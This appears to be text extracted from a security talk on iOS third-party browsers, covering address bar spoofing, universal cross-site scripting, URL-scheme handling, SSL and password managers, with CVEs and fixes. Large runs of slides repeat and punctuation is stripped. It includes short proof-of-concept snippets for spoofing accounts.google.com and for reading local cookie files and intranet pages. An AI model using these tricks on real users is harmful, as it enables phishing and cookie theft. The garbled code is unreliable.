bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Optionally fall-back to native windowopen
bull delete windowopenw = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Address Bar Spoofing
Address Bar Spoofing
Init amp Interruptbull CVE-2013-6895 Kaspersky Safe Browser
bull CVE-2013-6898 F-Secure Safe Browser
bull CVE-2013-6897 Dolphin Browser
bull hellip and 45 of tested browsers
bull Special guest star Google Chrome for Android CVE-2013-6642
Address Bar Spoofing
Bug Bounty-)
Address Bar Spoofing Failed Navigation
Address Bar Spoofing
Failed NavigationIncorrect URL often remains in address bar after navigation errors
bull DNS NXDOMAIN - host not found (httpslogintargettld)
bull TCP port closed (httpswwwtargettld448)
bull SSL errors (httpstargettld)
bull Display phishing page then redirect to ldquoincorrectrdquo URL
bull Mobile Safari before iOS 7 windowfocus() or windowopen()close() allowed suppressing error alerts
Address Bar Spoofing
Address Bar Spoofing Loading loop
Address Bar Spoofing
Loading loopbull HTTP request timeout in iOS browsers is usually
between 1 and 10 minutes
bull Address bar in Mobile Safari and many other iOS browsers is updated on navigation attempt even before an actual connection is made
bull Now we only need to find a target with filtered port 443
bull Or any filtered port because Mobile Safari shows only the hostname part of the URL
Address Bar Spoofing
Loading loop
bull documentwrite(Phishing page here) location = httpsaccountsgooglecom8443setInterval(function() location=httpsaccountsgooglecom8443 hellip)
Address Bar Spoofing
Address Bar Spoofing
Phishing page
Title bar
Address Bar Spoofing
lttitlegthttpswwwapplecomlttitlegt
Address bar tipsbull Display the URL that is currently loaded within
UIWebView not the one you think will be there
bull UIWebViewDelegate Update address bar on each event including webViewdidFailLoadWithError
bull Displaying SSL lock makes sense if there was an actual successful and valid SSL connection Spoofing https URL seems easy donrsquot make it worse by automatically adding SSL lock
bull iOS8 KVO-compliant WKWebViewURL property
Address Bar Spoofing
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
UXSS UniversalCross-Site Scripting
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users
bypassing same-origin policy
In UXSS the attacker exploits vulnerability in the browser not in the website
(~ httpenwikipediaorgwikiCross-site_scripting)
Famous after PDF UXSS in 2007
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
bull CVE-2013-6893 UXSS in Mercury Browser for iOS
bull CVE-2013-7197 UXSS in YandexBrowser for iOS
bull CVE-2012-2899 UXSS in Google Chrome for iOS
bull hellip
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
iOS Browsers
iOS Browsers
iOS Browser == Mobile Safari
bull iOS App Store Review GuidelinesbdquoApps that browse the web must use the iOS WebKit framework and WebKit Javascriptrdquo
Introduction iOS Browsers
WebView-based Proxy-rendering
iOS Third-Party Browsers
gt 60 browsers in App Store
UIWebView amp WKWebView
UIWebView amp WKWebView
UIWebView amp WKWebView
UIWebView API
bull loadRequest
bull loadHTMLStringbaseURL
bull loadDataMIMETypetextEncodingNamebaseURL
bull goBackgoForwardstopLoadingreload
bull request (read-only)
UIWebView amp WKWebView
UIWebView APIbull stringByEvaluatingJavaScriptFromString
in the origin of currently loaded requestmainDocumentURL
No access to subframesfrom other domain than
the top document
httpexamplecom
httphiddentld
UIWebView amp WKWebView
JavaScript used to
implement browser features
and to override native functions to bridge them with Objective-C code
UIWebView amp WKWebView
UIWebViewDelegate
bull webViewshouldStartLoadWithRequestnavigationType
bull webViewDidStartLoad
bull webViewDidFinishLoad
bull webViewdidFailLoadWithError
UIWebView amp WKWebView
iOS8 beta WKWebViewbull configurationpreferences
bull configurationuserContentController
bull navigationDelegate
bull UIDelegate
bull URL (KVO)
bull hasOnlySecureContent (KVO)
UIWebView amp WKWebView
Bolted-on by the browsersbull Address bar
bull Multiple tabs
bull Downloads
bull Support for untrusted SSL certificates
bull Autocomplete amp password manager
bull hellip and many more features (safety ratings malware protection cloud integration hellip)
UIWebView amp WKWebView
Testing
bull Inspiration from Browser Security Handbook
bull Retesting previous Mobile Safari bugs
bull ldquoBlack-boxrdquo testing from web perspective review of JavaScript code a bit of reversing debugging
bull Cross-browser test caseshttpsiosbrowsr-testscom
UIWebView amp WKWebView
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Address Bar Spoofing
Address Bar Spoofing
Address bar spoofing
Address Bar Spoofing
Look-alike
IDN etc
URL trackingdesynchronization
URL tracking desynchronization
bull Navigate to untracked content
bull Initiate navigation interrupt overwrite content
bull Failed navigation
bull Loading loop
bull Lots of other methods (race conditions history hellip)
bull Most of them known for over 10 years (IE Netscape)
Address Bar Spoofing
Address Bar Spoofing Untracked Content
Address Bar Spoofing
Untracked Content
Replace window content with untracked content
documentwrite andor data URIs are usually good candidates
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) setTimeout(function()wdocumentwrite() hellip)
Address Bar Spoofing
Untracked Content
bull CVE-2013-5152 Mobile Safari Address Bar Spoofingreported in iOS 511 fixed in iOS 7
Address Bar Spoofing
Address Bar Spoofing Init amp Interrupt
Address Bar Spoofing
Init amp InterruptInitialise window with target URL replace with phishing content before it loads
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Optionally fall-back to native windowopen
bull delete windowopenw = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Address Bar Spoofing
Address Bar Spoofing
Init amp Interruptbull CVE-2013-6895 Kaspersky Safe Browser
bull CVE-2013-6898 F-Secure Safe Browser
bull CVE-2013-6897 Dolphin Browser
bull hellip and 45 of tested browsers
bull Special guest star Google Chrome for Android CVE-2013-6642
Address Bar Spoofing
Bug Bounty-)
Address Bar Spoofing Failed Navigation
Address Bar Spoofing
Failed NavigationIncorrect URL often remains in address bar after navigation errors
bull DNS NXDOMAIN - host not found (httpslogintargettld)
bull TCP port closed (httpswwwtargettld448)
bull SSL errors (httpstargettld)
bull Display phishing page then redirect to ldquoincorrectrdquo URL
bull Mobile Safari before iOS 7 windowfocus() or windowopen()close() allowed suppressing error alerts
Address Bar Spoofing
Address Bar Spoofing Loading loop
Address Bar Spoofing
Loading loopbull HTTP request timeout in iOS browsers is usually
between 1 and 10 minutes
bull Address bar in Mobile Safari and many other iOS browsers is updated on navigation attempt even before an actual connection is made
bull Now we only need to find a target with filtered port 443
bull Or any filtered port because Mobile Safari shows only the hostname part of the URL
Address Bar Spoofing
Loading loop
bull documentwrite(Phishing page here) location = httpsaccountsgooglecom8443setInterval(function() location=httpsaccountsgooglecom8443 hellip)
Address Bar Spoofing
Address Bar Spoofing
Phishing page
Title bar
Address Bar Spoofing
lttitlegthttpswwwapplecomlttitlegt
Address bar tipsbull Display the URL that is currently loaded within
UIWebView not the one you think will be there
bull UIWebViewDelegate Update address bar on each event including webViewdidFailLoadWithError
bull Displaying SSL lock makes sense if there was an actual successful and valid SSL connection Spoofing https URL seems easy donrsquot make it worse by automatically adding SSL lock
bull iOS8 KVO-compliant WKWebViewURL property
Address Bar Spoofing
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
UXSS UniversalCross-Site Scripting
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users
bypassing same-origin policy
In UXSS the attacker exploits vulnerability in the browser not in the website
(~ httpenwikipediaorgwikiCross-site_scripting)
Famous after PDF UXSS in 2007
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
bull CVE-2013-6893 UXSS in Mercury Browser for iOS
bull CVE-2013-7197 UXSS in YandexBrowser for iOS
bull CVE-2012-2899 UXSS in Google Chrome for iOS
bull hellip
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
iOS Browser == Mobile Safari
bull iOS App Store Review GuidelinesbdquoApps that browse the web must use the iOS WebKit framework and WebKit Javascriptrdquo
Introduction iOS Browsers
WebView-based Proxy-rendering
iOS Third-Party Browsers
gt 60 browsers in App Store
UIWebView amp WKWebView
UIWebView amp WKWebView
UIWebView amp WKWebView
UIWebView API
bull loadRequest
bull loadHTMLStringbaseURL
bull loadDataMIMETypetextEncodingNamebaseURL
bull goBackgoForwardstopLoadingreload
bull request (read-only)
UIWebView amp WKWebView
UIWebView APIbull stringByEvaluatingJavaScriptFromString
in the origin of currently loaded requestmainDocumentURL
No access to subframesfrom other domain than
the top document
httpexamplecom
httphiddentld
UIWebView amp WKWebView
JavaScript used to
implement browser features
and to override native functions to bridge them with Objective-C code
UIWebView amp WKWebView
UIWebViewDelegate
bull webViewshouldStartLoadWithRequestnavigationType
bull webViewDidStartLoad
bull webViewDidFinishLoad
bull webViewdidFailLoadWithError
UIWebView amp WKWebView
iOS8 beta WKWebViewbull configurationpreferences
bull configurationuserContentController
bull navigationDelegate
bull UIDelegate
bull URL (KVO)
bull hasOnlySecureContent (KVO)
UIWebView amp WKWebView
Bolted-on by the browsersbull Address bar
bull Multiple tabs
bull Downloads
bull Support for untrusted SSL certificates
bull Autocomplete amp password manager
bull hellip and many more features (safety ratings malware protection cloud integration hellip)
UIWebView amp WKWebView
Testing
bull Inspiration from Browser Security Handbook
bull Retesting previous Mobile Safari bugs
bull ldquoBlack-boxrdquo testing from web perspective review of JavaScript code a bit of reversing debugging
bull Cross-browser test caseshttpsiosbrowsr-testscom
UIWebView amp WKWebView
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Address Bar Spoofing
Address Bar Spoofing
Address bar spoofing
Address Bar Spoofing
Look-alike
IDN etc
URL trackingdesynchronization
URL tracking desynchronization
bull Navigate to untracked content
bull Initiate navigation interrupt overwrite content
bull Failed navigation
bull Loading loop
bull Lots of other methods (race conditions history hellip)
bull Most of them known for over 10 years (IE Netscape)
Address Bar Spoofing
Address Bar Spoofing Untracked Content
Address Bar Spoofing
Untracked Content
Replace window content with untracked content
documentwrite andor data URIs are usually good candidates
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) setTimeout(function()wdocumentwrite() hellip)
Address Bar Spoofing
Untracked Content
bull CVE-2013-5152 Mobile Safari Address Bar Spoofingreported in iOS 511 fixed in iOS 7
Address Bar Spoofing
Address Bar Spoofing Init amp Interrupt
Address Bar Spoofing
Init amp InterruptInitialise window with target URL replace with phishing content before it loads
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Optionally fall-back to native windowopen
bull delete windowopenw = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Address Bar Spoofing
Address Bar Spoofing
Init amp Interruptbull CVE-2013-6895 Kaspersky Safe Browser
bull CVE-2013-6898 F-Secure Safe Browser
bull CVE-2013-6897 Dolphin Browser
bull hellip and 45 of tested browsers
bull Special guest star Google Chrome for Android CVE-2013-6642
Address Bar Spoofing
Bug Bounty-)
Address Bar Spoofing Failed Navigation
Address Bar Spoofing
Failed NavigationIncorrect URL often remains in address bar after navigation errors
bull DNS NXDOMAIN - host not found (httpslogintargettld)
bull TCP port closed (httpswwwtargettld448)
bull SSL errors (httpstargettld)
bull Display phishing page then redirect to ldquoincorrectrdquo URL
bull Mobile Safari before iOS 7 windowfocus() or windowopen()close() allowed suppressing error alerts
Address Bar Spoofing
Address Bar Spoofing Loading loop
Address Bar Spoofing
Loading loopbull HTTP request timeout in iOS browsers is usually
between 1 and 10 minutes
bull Address bar in Mobile Safari and many other iOS browsers is updated on navigation attempt even before an actual connection is made
bull Now we only need to find a target with filtered port 443
bull Or any filtered port because Mobile Safari shows only the hostname part of the URL
Address Bar Spoofing
Loading loop
bull documentwrite(Phishing page here) location = httpsaccountsgooglecom8443setInterval(function() location=httpsaccountsgooglecom8443 hellip)
Address Bar Spoofing
Address Bar Spoofing
Phishing page
Title bar
Address Bar Spoofing
lttitlegthttpswwwapplecomlttitlegt
Address bar tipsbull Display the URL that is currently loaded within
UIWebView not the one you think will be there
bull UIWebViewDelegate Update address bar on each event including webViewdidFailLoadWithError
bull Displaying SSL lock makes sense if there was an actual successful and valid SSL connection Spoofing https URL seems easy donrsquot make it worse by automatically adding SSL lock
bull iOS8 KVO-compliant WKWebViewURL property
Address Bar Spoofing
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
UXSS UniversalCross-Site Scripting
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users
bypassing same-origin policy
In UXSS the attacker exploits vulnerability in the browser not in the website
(~ httpenwikipediaorgwikiCross-site_scripting)
Famous after PDF UXSS in 2007
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
bull CVE-2013-6893 UXSS in Mercury Browser for iOS
bull CVE-2013-7197 UXSS in YandexBrowser for iOS
